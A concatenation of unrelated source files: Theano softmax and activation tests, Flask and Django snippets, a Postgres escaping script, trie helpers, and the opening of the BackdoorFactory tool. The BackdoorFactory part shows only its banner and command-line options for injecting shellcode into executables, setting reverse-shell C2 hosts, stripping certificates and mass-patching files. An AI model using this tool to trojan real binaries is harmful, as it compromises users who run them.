                print(i, n)
        # Gradient descent toward the correct labels: the cost must reach
        # exactly zero without numerical trouble.
        xval = numpy.zeros((5, 5), dtype=dtype).astype(dtype)
        x2val = numpy.zeros(5, dtype=xval.dtype).astype(dtype)
        for i in xrange(100):
            cval, gxval = f(xval, numpy.arange(5), x2val)
            xval -= 100.3 * gxval
        # print cval, gxval
        assert cval == 0  # no problem going to zero error
        # what about when x gets really big?
        # Gradient ASCENT: drive the cost to huge values and check the
        # gradient saturates sensibly instead of producing NaN/inf.
        xval = numpy.zeros((5, 5), dtype=dtype)
        x2val = numpy.zeros(5, dtype=xval.dtype)
        for i in xrange(100):
            cval, gxval = f(xval, numpy.arange(5), x2val)
            xval += 100000.3 * gxval
        # print cval, gxval
        assert cval > 61750000
        assert gxval[0, 0] == -1.0
        assert gxval[0, 1] == 0.25
class Test_softmax_opt:
    # Test that expressions of softmax in terms of exponentiated things
    # divided by row sums are replaced by softmax expressions.
    #
    # Softmax_grad isn't that interesting as an Op, but it has the signature
    # we look for when trying to insert CrossEntropySoftmax... grad. So, for
    # now, we add softmax_grad to graphs. In the future, we may modify the
    # CrossEntropySoftmax...grad to look for the more basic pattern.
    #
    def setUp(self):
        # Fresh seeded RNG and a compilation mode with canonicalization on,
        # since the softmax substitution happens during canonicalization.
        utt.seed_rng()
        self.rng = numpy.random.RandomState(utt.fetch_seed())
        self.mode = theano.compile.mode.get_default_mode()
        self.mode = self.mode.including('canonicalize')
    def test_basic(self):
        # exp(c) / exp(c).sum(axis=1) (broadcast via dimshuffle) must
        # collapse to a single softmax op.
        c = T.matrix()
        p_y = T.exp(c) / T.exp(c).sum(axis=1).dimshuffle(0, 'x')
        # test that function contains softmax and no div.
        f = theano.function([c], p_y, mode=self.mode)
        assert hasattr(f.maker.fgraph.outputs[0].tag, 'trace')
        f_ops = [n.op for n in f.maker.fgraph.toposort()]
        # print '--- f ='
        # printing.debugprint(f)
        # print '==='
        assert len(f_ops) == 1
        assert softmax_op in f_ops
        f(self.rng.rand(3, 4).astype(config.floatX))
    def test_basic_keepdims(self):
        # Same as test_basic but broadcasting through keepdims=True.
        c = T.matrix()
        p_y = T.exp(c) / T.exp(c).sum(axis=1, keepdims=True)
        # test that function contains softmax and no div.
        f = theano.function([c], p_y, mode=self.mode)
        assert hasattr(f.maker.fgraph.outputs[0].tag, 'trace')
        f_ops = [n.op for n in f.maker.fgraph.toposort()]
        # print '--- f ='
        # printing.debugprint(f)
        # print '==='
        assert len(f_ops) == 1
        assert softmax_op in f_ops
        f(self.rng.rand(3, 4).astype(config.floatX))
    def test_grad(self):
        c = T.matrix()
        p_y = T.exp(c) / T.exp(c).sum(axis=1).dimshuffle(0, 'x')
        # test that function contains softmax and softmaxgrad
        w = T.matrix()
        backup = config.warn.sum_div_dimshuffle_bug
        config.warn.sum_div_dimshuffle_bug = False
        try:
            g = theano.function([c, w], T.grad((p_y * w).sum(), c))
            hasattr(g.maker.fgraph.outputs[0].tag, 'trace')
        finally:
            config.warn.sum_div_dimshuffle_bug = backup
        g_ops = [n.op for n in g.maker.fgraph.toposort()]
        # print '--- g ='
        # printing.debugprint(g)
        # print '==='
        # NOTE: the optimization is disabled for now, so everything after
        # the SkipTest below is deliberately unreachable.
        raise SkipTest('Optimization not enabled for the moment')
        assert len(g_ops) == 2
        assert softmax_op in g_ops
        assert softmax_grad in g_ops
        g(self.rng.rand(3, 4), self.rng.uniform(.5, 1, (3, 4)))
    def test_transpose_basic(self):
        # this should be a transposed softmax
        c = T.matrix()
        p_y = T.exp(c) / T.exp(c).sum(axis=0)
        # test that function contains softmax and no div.
        f = theano.function([c], p_y)
        # printing.debugprint(f)
        # test that function contains softmax and no div.
        backup = config.warn.sum_div_dimshuffle_bug
        config.warn.sum_div_dimshuffle_bug = False
        try:
            g = theano.function([c], T.grad(p_y.sum(), c))
            hasattr(g.maker.fgraph.outputs[0].tag, 'trace')
        finally:
            config.warn.sum_div_dimshuffle_bug = backup
        # printing.debugprint(g)
        # NOTE: assertions for this case are not yet written; the test only
        # checks that compilation succeeds before skipping.
        raise SkipTest('Optimization not enabled for the moment')
    def test_1d_basic(self):
        # this should be a softmax, but of a one-row matrix
        c = T.vector()
        p_y = T.exp(c) / T.exp(c).sum()
        # test that function contains softmax and no div.
        f = theano.function([c], p_y)
        hasattr(f.maker.fgraph.outputs[0].tag, 'trace')
        # printing.debugprint(f)
        # test that function contains softmax and no div.
        backup = config.warn.sum_div_dimshuffle_bug
        config.warn.sum_div_dimshuffle_bug = False
        try:
            g = theano.function([c], T.grad(p_y.sum(), c))
            hasattr(g.maker.fgraph.outputs[0].tag, 'trace')
        finally:
            config.warn.sum_div_dimshuffle_bug = backup
        # printing.debugprint(g)
        raise SkipTest('Optimization not enabled for the moment')
    # REPEAT 3 CASES in presence of log(softmax) with the advanced indexing
    # etc.
def test_softmax_graph():
    # Numerical gradient check through softmax_graph when the output
    # gradient is injected via known_grads rather than a scalar cost.
    rand_state = numpy.random.RandomState(utt.fetch_seed())
    x = theano.shared(rand_state.normal(size=(3, 4)))
    def backprop(output_grads):
        y = softmax_graph(x)
        return theano.grad(None, x, known_grads={y: output_grads})
    utt.verify_grad(backprop, [rand_state.rand(3, 4)])
def test_grad_softmax_grad():
    # Same known_grads-based numerical gradient check, but through the
    # softmax_op Op instead of the symbolic softmax_graph expression.
    rand_state = numpy.random.RandomState(utt.fetch_seed())
    x = theano.shared(rand_state.normal(size=(3, 4)))
    def backprop(output_grads):
        y = softmax_op(x)
        return theano.grad(None, x, known_grads={y: output_grads})
    utt.verify_grad(backprop, [rand_state.rand(3, 4)])
def test_stabilize_log_softmax():
    # log(softmax(x)) should be rewritten by local_log_softmax into a
    # numerically stable form that no longer contains the Softmax op.
    mode = theano.compile.mode.get_default_mode()
    mode = mode.including('local_log_softmax', 'specialize')
    x = matrix()
    y = softmax(x)
    z = theano.tensor.log(y)
    f = theano.function([x], z, mode=mode)
    assert hasattr(f.maker.fgraph.outputs[0].tag, 'trace')
    # check that the softmax has been optimized out
    for node in f.maker.fgraph.toposort():
        assert not isinstance(node.op, y.owner.op.__class__)
    # call the function so debug mode can verify the optimized
    # version matches the unoptimized version
    rng = numpy.random.RandomState([2012, 8, 22])
    f(numpy.cast[config.floatX](rng.randn(2, 3)))
def test_relu():
    # relu(x) == max(x, 0); relu(x, alpha) == x where x > 0 else alpha * x,
    # for constant alphas and for symbolic alphas of rank 0, 1 and 2.
    x = matrix('x')
    seed = theano.tests.unittest_tools.fetch_seed()
    rng = numpy.random.RandomState(seed)
    X = rng.randn(20, 30).astype(config.floatX)
    # test the base case, without custom alpha value
    y = relu(x).eval({x: X})
    assert numpy.allclose(y, numpy.maximum(X, 0))
    # test for different constant alpha values (also outside of [0, 1])
    for alpha in 0, 0.3, 1, 2, -0.3, -1, -2:
        y = relu(x, alpha).eval({x: X})
        assert numpy.allclose(y, numpy.where(X > 0, X, alpha * X))
    # test for variable alpha (scalar, vector and matrix)
    for alpha in scalar(), vector(), matrix():
        # create value for alpha (correct ndim and broadcastable against X)
        A = numpy.array(rng.randn(*X.shape[::-1][:alpha.ndim][::-1]),
                        dtype=config.floatX)
        y = relu(x, alpha).eval({x: X, alpha: A})
        assert numpy.allclose(y, numpy.where(X > 0, X, A * X), rtol=3e-5)
def test_h_softmax():
    """
    Tests the output dimensions of the h_softmax when a target is provided or
    not.
    """
    #############
    # Config
    #############
    input_size = 4
    batch_size = 2
    h_softmax_level1_size = 5
    h_softmax_level2_size = 3
    # Total number of classes is the product of the two tree levels.
    output_size = h_softmax_level1_size * h_softmax_level2_size
    #############
    # Initialize shared variables
    #############
    floatX = theano.config.floatX
    shared = theano.shared
    # First level of h_softmax
    W1 = numpy.asarray(numpy.random.normal(
        size=(input_size, h_softmax_level1_size)), dtype=floatX)
    W1 = shared(W1)
    b1 = shared(numpy.asarray(numpy.zeros((h_softmax_level1_size,)),
                              dtype=floatX))
    # Second level of h_softmax
    W2 = numpy.asarray(numpy.random.normal(
        size=(h_softmax_level1_size, input_size, h_softmax_level2_size)),
        dtype=floatX)
    W2 = shared(W2)
    b2 = shared(
        numpy.asarray(numpy.zeros((h_softmax_level1_size,
                                   h_softmax_level2_size)), dtype=floatX))
    #############
    # Build graph
    #############
    x = tensor.matrix('x')
    y = tensor.ivector('y')
    # This only computes the output corresponding to the target
    y_hat_tg = h_softmax(x, batch_size, output_size, h_softmax_level1_size,
                         h_softmax_level2_size, W1, b1, W2, b2, y)
    # This computes all the outputs
    y_hat_all = h_softmax(x, batch_size, output_size, h_softmax_level1_size,
                          h_softmax_level2_size, W1, b1, W2, b2)
    #############
    # Compile functions
    #############
    fun_output_tg = theano.function([x, y], y_hat_tg)
    fun_output = theano.function([x], y_hat_all)
    #############
    # Test
    #############
    x_mat = numpy.random.normal(size=(batch_size, input_size)).astype(floatX)
    y_mat = numpy.random.randint(0, output_size, batch_size).astype('int32')
    tg_output = fun_output_tg(x_mat, y_mat)
    all_outputs = fun_output(x_mat)
    # With a target: one probability per example; without: the full
    # distribution over all classes.
    assert(tg_output.shape == (batch_size,))
    assert(all_outputs.shape == (batch_size, output_size))
    # Verifies that the outputs computed by fun_output_tg are the same as those
    # computed by fun_output.
    utt.assert_allclose(
        all_outputs[numpy.arange(0, batch_size), y_mat], tg_output)
def test_elu():
    # elu(x) must equal x where x > 0 and alpha * (exp(x) - 1) elsewhere,
    # for the default alpha and a few constant alphas (incl. negatives).
    x = matrix('x')
    rng = numpy.random.RandomState(theano.tests.unittest_tools.fetch_seed())
    X = rng.randn(20, 30).astype(config.floatX)
    # default alpha (1.0)
    utt.assert_allclose(elu(x).eval({x: X}),
                        numpy.where(X > 0, X, numpy.exp(X) - 1))
    # explicit constant alpha values
    for alpha in (1.5, 2, -1, -1.5, -2):
        expected = numpy.where(X > 0, X, alpha * (numpy.exp(X) - 1))
        utt.assert_allclose(elu(x, alpha).eval({x: X}), expected)
| {
"content_hash": "51da60669811ef90793b2e4048aef671",
"timestamp": "",
"source": "github",
"line_count": 1686,
"max_line_length": 97,
"avg_line_length": 37.80723606168446,
"alnum_prop": 0.5438557959305336,
"repo_name": "marcsans/cnn-physics-perception",
"id": "50242cdee99d8ab09a0a538f4671f4fb7cbe2b7f",
"size": "63743",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "phy/lib/python2.7/site-packages/theano/tensor/nnet/tests/test_nnet.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "489272"
},
{
"name": "C++",
"bytes": "3521811"
},
{
"name": "CSS",
"bytes": "7132"
},
{
"name": "Cuda",
"bytes": "232079"
},
{
"name": "FORTRAN",
"bytes": "9868"
},
{
"name": "HTML",
"bytes": "131419"
},
{
"name": "JavaScript",
"bytes": "23881"
},
{
"name": "Jupyter Notebook",
"bytes": "16254"
},
{
"name": "Makefile",
"bytes": "75861"
},
{
"name": "Matlab",
"bytes": "4346"
},
{
"name": "Objective-C",
"bytes": "567"
},
{
"name": "Python",
"bytes": "36682149"
},
{
"name": "Shell",
"bytes": "3878"
},
{
"name": "TeX",
"bytes": "14053"
}
],
"symlink_target": ""
} |
"""Tests module."""
from unittest import mock
import pytest
from github import Github
from flask import url_for
from .application import create_app
@pytest.fixture
def app():
    # Build a fresh Flask application per test; unwire the DI container on
    # teardown so provider overrides cannot leak between tests.
    app = create_app()
    yield app
    app.container.unwire()
def test_index(client, app):
    # Override the container's GitHub client with a mock whose repository
    # search yields two fake repos, then check the rendered index page
    # contains the count and every repo/owner field of both.
    # NOTE: `name=` in Mock(...) is the reserved Mock-name kwarg, not a plain
    # attribute — it still renders here because the template reads repo.name.
    github_client_mock = mock.Mock(spec=Github)
    github_client_mock.search_repositories.return_value = [
        mock.Mock(
            html_url="repo1-url",
            name="repo1-name",
            owner=mock.Mock(
                login="owner1-login",
                html_url="owner1-url",
                avatar_url="owner1-avatar-url",
            ),
            get_commits=mock.Mock(return_value=[mock.Mock()]),
        ),
        mock.Mock(
            html_url="repo2-url",
            name="repo2-name",
            owner=mock.Mock(
                login="owner2-login",
                html_url="owner2-url",
                avatar_url="owner2-avatar-url",
            ),
            get_commits=mock.Mock(return_value=[mock.Mock()]),
        ),
    ]
    with app.container.github_client.override(github_client_mock):
        response = client.get(url_for("example.index"))
    assert response.status_code == 200
    assert b"Results found: 2" in response.data
    assert b"repo1-url" in response.data
    assert b"repo1-name" in response.data
    assert b"owner1-login" in response.data
    assert b"owner1-url" in response.data
    assert b"owner1-avatar-url" in response.data
    assert b"repo2-url" in response.data
    assert b"repo2-name" in response.data
    assert b"owner2-login" in response.data
    assert b"owner2-url" in response.data
    assert b"owner2-avatar-url" in response.data
def test_index_no_results(client, app):
    """The index view renders a zero-count page when the search is empty."""
    stub_github = mock.Mock(spec=Github)
    stub_github.search_repositories.return_value = []
    with app.container.github_client.override(stub_github):
        response = client.get(url_for("example.index"))
    assert b"Results found: 0" in response.data
    assert response.status_code == 200
| {
"content_hash": "5f587e565e1e9d7fed16c6f35d5f4366",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 66,
"avg_line_length": 28.95774647887324,
"alnum_prop": 0.6215953307392996,
"repo_name": "rmk135/dependency_injector",
"id": "b00eeeb5c01923b76ec5e3c2f69580a92ff64df2",
"size": "2056",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "examples/miniapps/flask-blueprints/githubnavigator/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "171241"
}
],
"symlink_target": ""
} |
"""Admin classes for the server_guardian app."""
from django.contrib import admin
from . import models
class ServerAdmin(admin.ModelAdmin):
    """Custom admin for the ``Server`` model."""
    # Columns shown on the changelist page.
    list_display = ('name', 'url')
    # Fields (and their order) on the add/change form; token is editable too.
    fields = ('name', 'url', 'token')
    # Admin search box matches the server name only.
    search_fields = ['name']
class ServerLogAdmin(admin.ModelAdmin):
    """Custom admin for the ``ServerLog`` model."""
    list_display = ('server', 'label', 'time_logged', 'status_code')
    # ``server__name`` follows the foreign key so logs can be searched by
    # the related server's name as well as by log content.
    search_fields = ['response_body', 'content', 'server__name']
# Register both models with the default admin site using the custom
# ModelAdmin classes defined above.
admin.site.register(models.Server, ServerAdmin)
admin.site.register(models.ServerLog, ServerLogAdmin)
| {
"content_hash": "d7e830e9dacf46a6cc6b46fd2f67e3f1",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 68,
"avg_line_length": 29.80952380952381,
"alnum_prop": 0.6773162939297125,
"repo_name": "bitmazk/django-server-guardian",
"id": "319e66a6c8d45d48ed1af17ddfe15336d812adda",
"size": "626",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server_guardian/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "155"
},
{
"name": "HTML",
"bytes": "5154"
},
{
"name": "Makefile",
"bytes": "323"
},
{
"name": "Python",
"bytes": "35611"
}
],
"symlink_target": ""
} |
"""
Post process revisions so that Postgres properly understands backslashes.
Usage:
revisions_postgres_post_process (-h|--help)
revisions_postgres_post_process <input> --revisions-output=<location>
[--debug]
[--verbose]
Options:
-h, --help This help message is printed
<input> Path to file to process.
--revisions-output=<location> Where revisions results
will be written
--debug Print debug logging to stderr
--verbose Print dots and stuff to stderr
"""
import docopt
import sys
import logging
import mwxml
import gzip
from collections import defaultdict
import re
logger = logging.getLogger(__name__)
# Matches lines containing at least one backslash; only the boolean
# match/no-match result is used, the capture group is ignored.
BACKSLASH_RE = re.compile(r'.*(\\).*')
def main(argv=None):
    """Parse command-line arguments and stream the input through ``run``.

    Parameters
    ----------
    argv : list of str, optional
        Argument vector for docopt; ``None`` means ``sys.argv[1:]``.
    """
    # Forward argv so callers/tests can inject arguments; the original
    # accepted the parameter but silently ignored it and always read
    # sys.argv.
    args = docopt.docopt(__doc__, argv=argv)

    logging.basicConfig(
        level=logging.INFO if not args['--debug'] else logging.DEBUG,
        format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'
    )

    # Context managers guarantee both handles are flushed and closed even
    # if run() raises; the original leaked both file objects.
    with open(args['<input>'], "r") as input_file, \
            open(args['--revisions-output'], "w") as revisions_output_file:
        run(input_file, revisions_output_file, args['--verbose'])
def run(input_file, revisions_output_file, verbose):
    """Copy lines from input to output, doubling backslashes for Postgres.

    Parameters
    ----------
    input_file : iterable of str
        Lines of the source file (any line iterator works).
    revisions_output_file : file-like
        Writable text stream receiving the processed lines.
    verbose : bool
        When True, progress is reported on stderr every 10000 lines.
    """
    for i, line in enumerate(input_file):
        if verbose and i % 10000 == 0 and i != 0:
            sys.stderr.write("Revisions processed: {0}\n".format(i))
            sys.stderr.flush()
        # A plain substring test replaces the module-level BACKSLASH_RE
        # regex: for single-line inputs both just mean "line contains a
        # backslash", and str.replace avoids the quadruple-escaped re.sub
        # replacement string.  Each backslash is doubled so Postgres COPY
        # treats it as a literal character.
        if '\\' in line:
            revisions_output_file.write(line.replace('\\', '\\\\'))
        else:
            revisions_output_file.write(line)
    if verbose:
        sys.stderr.write("Completed writing out result file\n")
        sys.stderr.flush()
main()
| {
"content_hash": "18f0e463fd42d60e5741cfe806d63adf",
"timestamp": "",
"source": "github",
"line_count": 69,
"max_line_length": 73,
"avg_line_length": 26.231884057971016,
"alnum_prop": 0.5828729281767956,
"repo_name": "hall1467/wikidata_usage_tracking",
"id": "6a4c747c82b73b45609c01445dd859d3e7f62239",
"size": "1810",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sql_scripts/postgres/longitudinal_misalignment_tables/revisions_postgres_post_process.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "148794588"
},
{
"name": "Makefile",
"bytes": "2082"
},
{
"name": "PLpgSQL",
"bytes": "1178"
},
{
"name": "Python",
"bytes": "406672"
},
{
"name": "R",
"bytes": "27795"
},
{
"name": "Shell",
"bytes": "181625"
},
{
"name": "TSQL",
"bytes": "61223"
}
],
"symlink_target": ""
} |
def select_rand_item(dict):
    """Return a uniformly random key from *dict*.

    Note: the parameter name shadows the builtin ``dict``; it is kept for
    backward compatibility with keyword callers.
    """
    import random
    # Iterating a dict yields its keys, so list(dict) == list(dict.keys()).
    return random.choice(list(dict))
#bool function for checking if word terminates a statement
def isterminal(word):
    """Return True if *word* ends a sentence ('.', '?' or '!').

    Uses ``str.endswith`` with a tuple of terminators, which also handles
    the empty string gracefully (returns False) instead of raising
    IndexError as the original ``word[len(word)-1]`` indexing did.
    """
    return word.endswith(('.', '?', '!'))
#gets a random statement from a trie
def random_statement(trie):
    """Random-walk the trie, collecting words until a terminal word is hit.

    Words are joined with single spaces; the terminating word (one ending
    in '.', '?' or '!') carries no trailing space.  An empty trie yields
    the empty string.
    """
    parts = []
    node = trie
    while node != {}:
        word = select_rand_item(node)
        if isterminal(word):
            parts.append(word)
            break
        parts.append(word + " ")
        node = node[word]
    return "".join(parts)
class wordstack:
    """Placeholder for a planned word-stack helper; no behavior yet."""
    pass
"content_hash": "391f23185b3143cb4914c94aa043bb19",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 91,
"avg_line_length": 23.142857142857142,
"alnum_prop": 0.5941358024691358,
"repo_name": "jweinst1/SquidWord",
"id": "4dbfc0a4a996d704c4de5ec4c61247862a6e2439",
"size": "729",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Squidword/Trie_Utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12009"
}
],
"symlink_target": ""
} |
import os
from crosspm.helpers.python import get_object_from_string
def test_get_object_from_string():
    """A dotted path must resolve to the exact same module object."""
    resolved = get_object_from_string('os.path')
    assert resolved is os.path
| {
"content_hash": "6921e9b10bba2908f8bac76e7fe1148b",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 57,
"avg_line_length": 22.25,
"alnum_prop": 0.7191011235955056,
"repo_name": "devopshq/crosspm",
"id": "1ac9596d88ac26d2915b62ed8d578cef1375d09b",
"size": "202",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_helpers_python.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CMake",
"bytes": "8406"
},
{
"name": "Jinja",
"bytes": "669"
},
{
"name": "Python",
"bytes": "229070"
},
{
"name": "Shell",
"bytes": "8264"
}
],
"symlink_target": ""
} |
'''
BackdoorFactory (BDF) v2 - Tertium Quid
Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org--
Without him, I would still be trying to do stupid things
with the elf format.
Also thanks to Silvio Cesare with his 1998 paper
(http://vxheaven.org/lib/vsc01.html) which these ELF patching
techniques are based on.
Special thanks to Travis Morrow for poking holes in my ideas.
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import sys
import os
import signal
import time
from random import choice
from optparse import OptionParser
from pebin import pebin
from elfbin import elfbin
def signal_handler(signal, frame):
    # SIGINT (Ctrl-C) handler: announce the exit and terminate cleanly.
    # Note: the first parameter shadows the module-level ``signal`` import;
    # harmless here since the handler never uses the module.
    print '\nProgram Exit'
    sys.exit(0)
class bdfMain():
    # NOTE(review): this "class" is really a script — every statement below
    # (argument parsing, banner printing, patching) executes at class-
    # definition time, i.e. when the module is imported.  Instantiating
    # bdfMain() afterwards does no additional work.

    # Release string shown in the banner.
    version = """\
    2.2.7
    """

    author = """\
    Author:    Joshua Pitts
    Email:     the.midnite.runr[a t]gmail<d o t>com
    Twitter:   @midnite_runr
    """

    #ASCII ART
    # Two alternative banners; one is picked at random below.
    menu = ["-.(`-') (`-') _ <-"
            ".(`-') _(`-') (`-')\n"
            "__( OO) (OO ).-/ _ __( OO)"
            "( (OO ).-> .-> .-> <-.(OO ) \n"
            "'-'---.\ / ,---. \-,-----.'-'. ,--"
            ".\ .'_ (`-')----. (`-')----. ,------,) \n"
            "| .-. (/ | \ /`.\ | .--./| .' /"
            "'`'-..__)( OO).-. '( OO).-. '| /`. ' \n"
            "| '-' `.) '-'|_.' | /_) (`-')| /)"
            "| | ' |( _) | | |( _) | | || |_.' | \n"
            "| /`'. |(| .-. | || |OO )| . ' |"
            " | / : \| |)| | \| |)| || . .' \n"
            "| '--' / | | | |(_' '--'\| |\ \|"
            " '-' / ' '-' ' ' '-' '| |\ \ \n"
            "`------' `--' `--' `-----'`--' '--'"
            "`------' `-----' `-----' `--' '--' \n"
            " (`-') _ (`-') "
            " (`-') \n"
            " <-. (OO ).-/ _ ( OO).-> "
            " .-> <-.(OO ) .-> \n"
            "(`-')-----./ ,---. \-,-----./ '._"
            " (`-')----. ,------,) ,--.' ,-. \n"
            "(OO|(_\---'| \ /`.\ | .--./|'--...__)"
            "( OO).-. '| /`. '(`-')'.' / \n"
            " / | '--. '-'|_.' | /_) (`-')`--. .--'"
            "( _) | | || |_.' |(OO \ / \n"
            " \_) .--'(| .-. | || |OO ) | | "
            " \| |)| || . .' | / /) \n"
            " `| |_) | | | |(_' '--'\ | | "
            " ' '-' '| |\ \ `-/ /` \n"
            " `--' `--' `--' `-----' `--' "
            " `-----' `--' '--' `--' \n",
            "__________ "
            " __ .___ \n"
            "\______ \_____ ____ "
            "| | __ __| _/____ ___________ \n"
            " | | _/\__ \ _/ ___\|"
            " |/ // __ |/ _ \ / _ \_ __ \ \n"
            " | | \ / __ \\\\ \__"
            "_| </ /_/ ( <_> | <_> ) | \/\n"
            " |______ /(____ /\___ >"
            "__|_ \____ |\____/ \____/|__| \n"
            " \/ \/ \/"
            " \/ \/ \n"
            "___________ "
            "__ \n"
            "\_ _____/____ _____/"
            " |_ ___________ ___.__. \n"
            " | __) \__ \ _/ ___\ "
            " __\/ _ \_ __ < | | \n"
            " | \ / __ \\\\ \__"
            "_| | ( <_> ) | \/\___ | \n"
            " \___ / (____ /\___ >_"
            "_| \____/|__| / ____| \n"
            " \/ \/ \/ "
            " \/ \n"]

    # Install the Ctrl-C handler before any long-running work starts.
    signal.signal(signal.SIGINT, signal_handler)

    # ---- command-line interface definition ----
    parser = OptionParser()
    parser.add_option("-f", "--file", dest="FILE", action="store",
                      type="string",
                      help="File to backdoor")
    parser.add_option("-s", "--shell", default="show", dest="SHELL",
                      action="store", type="string",
                      help="Payloads that are available for use."
                      " Use 'show' to see payloads."
                      )
    parser.add_option("-H", "--hostip", default=None, dest="HOST",
                      action="store", type="string",
                      help="IP of the C2 for reverse connections.")
    parser.add_option("-P", "--port", default=None, dest="PORT",
                      action="store", type="int",
                      help="The port to either connect back to for reverse "
                      "shells or to listen on for bind shells")
    parser.add_option("-J", "--cave_jumping", dest="CAVE_JUMPING",
                      default=False, action="store_true",
                      help="Select this options if you want to use code cave"
                      " jumping to further hide your shellcode in the binary."
                      )
    parser.add_option("-a", "--add_new_section", default=False,
                      dest="ADD_SECTION", action="store_true",
                      help="Mandating that a new section be added to the "
                      "exe (better success) but less av avoidance")
    parser.add_option("-U", "--user_shellcode", default=None,
                      dest="SUPPLIED_SHELLCODE", action="store",
                      help="User supplied shellcode, make sure that it matches"
                      " the architecture that you are targeting."
                      )
    parser.add_option("-c", "--cave", default=False, dest="FIND_CAVES",
                      action="store_true",
                      help="The cave flag will find code caves that "
                      "can be used for stashing shellcode. "
                      "This will print to all the code caves "
                      "of a specific size."
                      "The -l flag can be use with this setting.")
    parser.add_option("-l", "--shell_length", default=380, dest="SHELL_LEN",
                      action="store", type="int",
                      help="For use with -c to help find code "
                      "caves of different sizes")
    parser.add_option("-o", "--output-file", default=None, dest="OUTPUT",
                      action="store", type="string",
                      help="The backdoor output file")
    parser.add_option("-n", "--section", default="sdata", dest="NSECTION",
                      action="store", type="string",
                      help="New section name must be "
                      "less than seven characters")
    parser.add_option("-d", "--directory", dest="DIR", action="store",
                      type="string",
                      help="This is the location of the files that "
                      "you want to backdoor. "
                      "You can make a directory of file backdooring faster by "
                      "forcing the attaching of a codecave "
                      "to the exe by using the -a setting.")
    parser.add_option("-w", "--change_access", default=True,
                      dest="CHANGE_ACCESS", action="store_false",
                      help="This flag changes the section that houses "
                      "the codecave to RWE. Sometimes this is necessary. "
                      "Enabled by default. If disabled, the "
                      "backdoor may fail.")
    parser.add_option("-i", "--injector", default=False, dest="INJECTOR",
                      action="store_true",
                      help="This command turns the backdoor factory in a "
                      "hunt and shellcode inject type of mechinism. Edit "
                      "the target settings in the injector module.")
    parser.add_option("-u", "--suffix", default=".old", dest="SUFFIX",
                      action="store", type="string",
                      help="For use with injector, places a suffix"
                      " on the original file for easy recovery")
    parser.add_option("-D", "--delete_original", dest="DELETE_ORIGINAL",
                      default=False, action="store_true",
                      help="For use with injector module. This command"
                      " deletes the original file. Not for use in production "
                      "systems. *Author not responsible for stupid uses.*")
    parser.add_option("-O", "--disk_offset", dest="DISK_OFFSET", default=0,
                      type="int", action="store",
                      help="Starting point on disk offset, in bytes. "
                      "Some authors want to obfuscate their on disk offset "
                      "to avoid reverse engineering, if you find one of those "
                      "files use this flag, after you find the offset.")
    parser.add_option("-S", "--support_check", dest="SUPPORT_CHECK",
                      default=False, action="store_true",
                      help="To determine if the file is supported by BDF prior"
                      " to backdooring the file. For use by itself or with "
                      "verbose. This check happens automatically if the "
                      "backdooring is attempted."
                      )
    parser.add_option("-M", "--cave-miner", dest="CAVE_MINER", default=False, action="store_true",
                      help="Future use, to help determine smallest shellcode possible in a PE file"
                      )
    parser.add_option("-q", "--no_banner", dest="NO_BANNER", default=False, action="store_true",
                      help="Kills the banner."
                      )
    parser.add_option("-v", "--verbose", default=False, dest="VERBOSE",
                      action="store_true",
                      help="For debug information output.")
    parser.add_option("-T", "--image-type", dest="IMAGE_TYPE", default="ALL",
                      type='string',
                      action="store", help="ALL, x86, or x64 type binaries only. Default=ALL")
    parser.add_option("-Z", "--zero_cert", dest="ZERO_CERT", default=True, action="store_false",
                      help="Allows for the overwriting of the pointer to the PE certificate table"
                      " effectively removing the certificate from the binary for all intents"
                      " and purposes."
                      )
    parser.add_option("-R", "--runas_admin", dest="CHECK_ADMIN", default=False, action="store_true",
                      help="Checks the PE binaries for \'requestedExecutionLevel level=\"highestAvailable\"\'"
                      ". If this string is included in the binary, it must run as system/admin. Doing this "
                      "slows patching speed significantly."
                      )
    parser.add_option("-L", "--patch_dll", dest="PATCH_DLL", default=True, action="store_false",
